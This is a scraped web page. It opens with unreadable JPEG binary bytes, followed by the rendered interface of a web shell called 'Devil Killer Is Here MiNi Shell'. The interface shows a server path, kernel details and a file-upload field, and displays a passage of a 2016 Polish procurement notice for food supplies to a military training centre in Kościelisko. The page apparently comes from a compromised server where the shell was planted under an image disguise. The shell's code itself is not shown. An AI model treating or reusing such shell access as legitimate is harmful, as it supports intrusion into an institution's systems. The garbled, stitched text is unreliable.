JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161021/328410-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.woszk-zakopane.wp.mil.pl' target='_blank'>www.woszk-zakopane.wp.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 328410 - 2016
              z dnia 2016-10-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kościelisko: DOSTAWA PRZETWORÓW OWOCOWYCH I WARZYWNYCH,PRODUKTÓW OGÓLNOSPOŻYWCZYCH I WODY
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wojskowy Ośrodek Szkoleniowo-Kondycyjny w Zakopanem, krajowy numer identyfikacyjny
              49002828900000, ul.
              ul. Strzelców Podhalańskich 
              4,
              34511  
              Kościelisko, woj.
              małopolskie, państwo
              Polska, tel.
              261 118 014, e-mail
              , faks
              261 118 008.
              <br />
              Adres strony internetowej (URL): www.woszk-zakopane.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: JEDNOSTKA WOJSKOWA</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.woszk-zakopane.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w siedzibie zamawiającego, budynek nr 1 (Sztab), pokój nr 101 (Kancelaria), lub przesłać listownie.<br />
                Adres:
                <br />Wojskowy Ośrodek Szkoleniowo-Kondycyjny w Zakopanem, ul. Strzelców Podhalańskich 4, 34-511 Kościelisko.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOSTAWA PRZETWORÓW OWOCOWYCH I WARZYWNYCH,PRODUKTÓW OGÓLNOSPOŻYWCZYCH I WODY
<br /><b>Numer referencyjny: </b>4/P/ŻYWN/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest sukcesywna dostawa przetworów owocowych i warzywnych, produktów ogólnospożywczych i wody, zwanych dalej towarem, dla Wojskowego Ośrodka Szkoleniowo-Kondycyjnego w Zakopanem, ul. Strzelców Podhalańskich 4, 34-511 Kościelisko. Szczegółowy zakres niniejszego zamówienia został określony w Specyfikacji Istotnych Warunków Zamówienia (SIWZ) w zał. nr 5 A - B do SIWZ  Szczegółowa oferta cenowa  zadanie nr 1-2 oraz w zał. nr 6 A - B do SIWZ  Opis przedmiotu zamówienia  zadanie nr 1-2.
2.	Zamawiający dopuszcza możliwości składania ofert częściowych z uwzględnieniem podziału zakresu zamówienia na dwa zadania:
Zadanie nr 1  dostawa owocowych i warzywnych;
Zadanie nr 2  dostawa produktów ogólnospożywczych i wody.

Zamawiający dopuszcza  możliwość złożenia oferty  na dowolną liczbę zadań, przy czym oferty dotyczące poszczególnych zadań muszą być kompletne.
3.	Wymagania dotyczące wytworzenia i dowozu przedmiotu zamówienia:
3.1.	Wykonawca dostarczy towar zgodny z opisem określonym w zał. nr 6 A - B do SIWZ  Szczegółowy opis przedmiotu zamówienia  zadanie 1 - 2.
3.2.	Wykonawca dostarczy towar wytworzony zgodnie z krajowymi i unijnymi przepisami prawa żywnościowego, w szczególności: ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2015 r., poz. 594 ze zm.) wraz z aktami wykonawczymi.
3.3.	Wykonawca będzie posiadał przez cały okres realizacji umowy aktualną decyzję administracyjną właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzania, warunkowego zatwierdzania, przedłużania warunkowego zatwierdzania zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust. 1 pkt 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2015 r., poz. 594 ze zm.) oraz aktualny dokument potwierdzający stosowanie wdrożonego systemu HACCP.
Podstawa prawna: ustawa z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2015 r., poz. 594 ze zm.). 
3.4.	Wykonawca będzie posiadał przez okres obowiązywania umowy, wydłużony o okres przydatności do spożycia dostarczonych towarów, ubezpieczenie odpowiedzialności cywilnej do wysokości nie niższej niż 100.000,00 zł w zakresie prowadzonej działalności, obejmujące również odpowiedzialność ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez wyprodukowane, dostarczone lub sprzedane towary oraz szkody spowodowane przez niewykonanie lub nienależyte wykonanie zamówienia w okresie ubezpieczenia.
3.5.	Wykonawca będzie dostarczał towar do WOSzK w Zakopanem w m. Kościelisko z wykorzystaniem specjalistycznego transportu, z zachowaniem wymogów określonych w rozporządzeniu (WE) Nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. U. UE z 2004 r., L 139).
3.6.	Zamawiający informuje, że dostawa przedmiotu zamówienia będzie się odbywała partiami, po wcześniejszym złożeniu zamówienia na towar w formie pisemnej lub za pośrednictwem faksu, z określeniem terminu dostawy, asortymentu oraz ilości towaru, nie później niż na jeden dzień przed terminem dostawy lub przy odbiorze dostawy - na następną dostawę, transportem wykonawcy, na jego koszt i ryzyko. Wyjątkowo dopuszcza się składanie zamówień w formie telefonicznej.
3.7.	Dostawy będą realizowane do magazynu WOSzK w Zakopanem w m. Kościelisko  adres: 34-511 Kościelisko, ul. Strzelców Podhalańskich 4.
3.8.	Częstotliwość dostaw: trzy razy w tygodniu od poniedziałku do piątku w godz. 07.00  11.00,
Zamawiający zastrzega sobie możliwość zwiększenia częstotliwości dostaw i zmiany godzin przyjęcia towaru oraz - w szczególnie uzasadnionych przypadkach - zgłoszenie nieplanowanego zamówienia, którego czas dostawy nie może przekroczyć 6 godzin licząc od godziny przekazania zamówienia wykonawcy.
3.9.	Wymagany termin przydatności do spożycia towaru: został określony w zał. nr 6 A - B do SIWZ  Szczegółowy opis przedmiotu zamówienia  zadanie 1 - 2.
3.10.	Towar będzie dostarczany w opakowaniach właściwych dla danego rodzaju towaru, zgodnie z zał. nr 6 A - B do SIWZ -  Szczegółowy opis przedmiotu zamówienia  zadanie 1-2. Zamawiający nie dopuszcza stosowania opakowań zastępczych oraz umieszczania reklam na opakowaniach.
3.11.	W trakcie dostawy przedmiotu zamówienia wykonawca będzie zobowiązany poddać się procedurom bezpieczeństwa stosowanym podczas realizacji dostaw przez służbę dyżurną WOSzK w Zakopanem.
3.12.	Przedmiot zamówienia przedstawiony w zał. nr 5 A - B do SIWZ  Szczegółowa oferta cenowa  zadanie nr 1-2 oraz w zał. nr 6 A - B do SIWZ  Szczegółowy opis przedmiotu zamówienia  zadanie 1-2, ma być dostarczany sukcesywnie, w zależności od bieżących potrzeb zamawiającego w okresie obowiązywania umowy.
3.13.	Zamawiający zastrzega sobie możliwość ograniczenia przedmiotu zamówienia w okresie trwania umowy z przyczyn niezależnych od zamawiającego i zamówienie w zakresie poszczególnych asortymentów mniejszych ilości niż określone w zał. nr 5 A - B do SIWZ  Szczegółowa oferta cenowa  zadanie nr 1-2, a także dokonanie zmian ilościowych w zakresie poszczególnych asortymentów kosztem innych asortymentów stosownie do bieżących potrzeb zamawiającego, w granicach nieprzekraczających ogólnego wynagrodzenia określonego w umowie przy czym wykonawcy nie przysługują roszczenia o realizację umowy w zakresie przekraczającym uzasadnione potrzeby zamawiającego. Realizacja umowy będzie uzależniona od faktycznych potrzeb wynikających ze zmiennej liczby uprawnionych do żywienia osób.
3.14.	Wykonawca będzie zobowiązany do realizacji umowy w sytuacjach kryzysowych w rozumieniu ustawy z dnia 26 kwietnia 2007 r. o zarządzaniu kryzysowym (Dz. U. z 2013 r., poz. 1166 ze zm.) do miejsc wskazanych przez zamawiającego na terenie całego kraju.
3.15.	W szczególnie uzasadnionych przypadkach, np. osiągania wyższych stanów gotowości bojowej, szkolenia poligonowego, szkolenia rezerw osobowych, likwidacji klęsk żywiołowych lub innych obowiązków nałożonych przez organy władzy państwowej, wykonawca będzie zobowiązany do zwiększenia ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zamówień oraz do zapewnienia dostaw do miejsc wskazanych przez zamawiającego na terenie całego kraju wg cen zawartych w umowie. Jednakże zmiany te mogą następować wyłącznie w ramach ustalonej wartości przedmiotu zamówienia i jego ilości zawartej w umowie.
4.	Dostawca ponosi pełną odpowiedzialność za wszelkie szkody spowodowane nieprawidłowym wykonaniem obowiązków przez swoich pracowników.
5.	Przejazd pojazdów Dostawcy po terenie WOSzK  w Zakopanem, będzie się odbywał po trasie uzgodnionej z upoważnionym przedstawicielem Zamawiającego, z zachowaniem zasad bezpiecznego poruszania się osób i pojazdów po drogach, zgodnie z istniejącym oznakowaniem dróg wewnętrznych.
6.	Dostawca ponosi pełną odpowiedzialność za ewentualne szkody poniesione przez osoby i szkody w mieniu wojskowym oraz mieniu osób trzecich, spowodowane przez pojazdy Wykonawcy na terenie WOSzK  w Zakopanem.
7.	Przedmiot zamówienia nie generuje i nie wygeneruje żadnych kosztów eksploatacji w całym okresie korzystania z przedmiotu zamówienia. W związku z powyższym nie mogą być one uwzględnione w opisie przedmiotu zamówienia.
8.	Podstawą do realizacji dostawy będzie zawarcie umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>15330000-0<br /><b> Dodatkowe kody CPV:</b>15320000-7,
                15310000-4,
                15610000-7,
                15981000-8,
                15410000-5,
                15800000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada:
	posiada aktualną decyzję administracyjną właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzania, warunkowego zatwierdzania, przedłużania warunkowego zatwierdzania zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust. 1 pkt 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2015 r., poz. 594 ze zm.), określającą rodzaj i zakres działalności;
	aktualny dokument potwierdzający, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał lub wykonuje w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, dostawy przetworów owocowych i warzywnych lub produktów ogólnospożywczych z podaniem ich wartości, daty wykonania i podmiotów, na rzecz których dostawy te były wykonane oraz załączy dowody czy dostawy te zostały lub są wykonywane należycie;
- dowodami dotyczącymi dostaw, określającymi czy dostawy te zostały wykonane należycie, są poświadczenia, z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych, poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, a przypadku gdy wykonawca z uzasadnionych przyczyn o obiektywnym charakterze nie jest w stanie uzyskać poświadczenia  inne dokumenty;
- 	w przypadku złożenia innych dokumentów wymaga się, by wykonawca uzasadnił, z jakich przyczyn o obiektywnym charakterze, nie mógł pozyskać poświadczenia.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - w celu potwierdzenia braku podstaw wykluczenia na podstawie  art. 24 ust. 5 pkt 1 ustawy  w przypadku gdy zamawiający nie będzie mógł samodzielnie pobrać dokumentu z ogólnodostępnych rejestrów publicznych.
Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej -sporządzone na podstawie zał. nr 3 do SIWZ</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Aktualna decyzja administracyjna właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzania, warunkowego zatwierdzania, przedłużania warunkowego zatwierdzania zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust. 1 pkt 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2015 r., poz. 594 ze zm.).
2. Aktualny dokument potwierdzający, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP (podstawa prawna: art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2015 r., poz. 594 ze zm.) w jednej z następujących form:
Certyfikat HACCP, wystawiony przez niezależną, akredytowaną jednostkę certyfikującą;
lub
Zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub właściwego organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP, wydane na podstawie art. 59 i art. 73 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia;
lub
protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej, jako organ urzędowej kontroli żywności, w skład którego wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymania systemu HACCP na podstawie art. 59 i art. 73 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia;
3. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw przetworów owocowych i warzywnych lub produktów ogólnospożywczych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, z załączonymi dowodami czy dostawy te zostały wykonane lub są wykonywane należycie - sporządzony zgodnie z zał. nr 7 do SIWZ  Wykaz wykonanych dostaw oraz pkt V ppkt 6.2. SIWZ.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
